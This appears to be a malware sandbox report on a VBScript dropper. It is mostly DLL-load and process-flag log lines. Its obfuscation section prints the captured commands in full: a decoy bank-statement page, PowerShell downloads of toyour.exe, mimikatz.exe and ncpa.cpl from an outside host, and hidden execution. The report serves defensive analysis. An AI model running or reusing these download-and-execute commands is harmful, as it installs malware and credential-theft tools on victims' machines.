Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\cmd.exeSection loaded: dlnashext.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wpdshext.dll
Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dll
Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\cmd.exeSection loaded: duser.dll
Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dll
Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dll
Source: C:\Windows\System32\control.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\control.exeSection loaded: wldp.dll
Source: C:\Windows\System32\control.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\control.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\control.exeSection loaded: propsys.dll
Source: C:\Windows\System32\control.exeSection loaded: profapi.dll
Source: C:\Windows\System32\control.exeSection loaded: edputil.dll
Source: C:\Windows\System32\control.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\control.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\control.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\control.exeSection loaded: netutils.dll
Source: C:\Windows\System32\control.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\control.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\control.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\control.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\control.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\control.exeSection loaded: slc.dll
Source: C:\Windows\System32\control.exeSection loaded: userenv.dll
Source: C:\Windows\System32\control.exeSection loaded: sppc.dll
Source: C:\Windows\System32\control.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\control.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\control.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\control.exeSection loaded: mpr.dll
Source: C:\Windows\System32\control.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cmd /c powershell start-process msedge https://www.scribd.com/document/806", "0", "true");IWshShell3.Run("cmd /c powershell start-process msedge https://www.scribd.com/document/806", "0", "true");IWshShell3.Run("cmd /c powershell -inputformat none -outputformat none -NonInteractive -Co", "0", "true");IWshShell3.Run("cmd /c powershell start-process msedge https://www.scribd.com/document/806", "0", "true");IWshShell3.Run("cmd /c powershell -inputformat none -outputformat none -NonInteractive -Co", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour", "0", "true");IWshShell3.Run("cmd /c powershell start-process msedge https://www.scribd.com/document/806", "0", "true");IWshShell3.Run("cmd /c powershell -inputformat none -outputformat none -NonInteractive -Co", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimika", "0", "true");IWshShell3.Run("cmd /c powershell start-process msedge https://www.scribd.com/document/806", "0", "true");IWshShell3.Run("cmd /c powershell -inputformat none -outputformat none -NonInteractive -Co", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimika", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.c", "0", "true");IWshShell3.Run("cmd /c powershell start-process msedge https://www.scribd.com/document/806", "0", "true");IWshShell3.Run("cmd /c powershell -inputformat none -outputformat none -NonInteractive -Co", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimika", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.c", "0", "true");IWshShell3.Run("cmd /c start /b control C:\\WinXRAR\\ncpa.cpl", "0", "false");IWshShell3.Run("cmd /c powershell start-process msedge https://www.scribd.com/document/806", "0", "true");IWshShell3.Run("cmd /c powershell -inputformat none -outputformat none -NonInteractive -Co", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimika", "0", "true");IWshShell3.Run("cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.c", "0", "true");IWshShell3.Run("cmd /c start /b control C:\\WinXRAR\\ncpa.cpl", "0", "false");IWshShell3.Run("cmd /c start /b powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe", "0", "false");IWshShell3.Run("cmd /c powershell start-process msedge https://www.scribd.com/document/806", "0",
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process msedge https://www.scribd.com/document/806838445/Bank-StatementJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/toyour.exe -Outfile C:\\WinXRAR\\toyour.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\\WinXRAR\\mimikatz.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/ncpa.cpl -Outfile C:\\WinXRAR\\ncpa.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath C:\\WinXRAR\\toyour.exe -WindowStyle Hidden

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
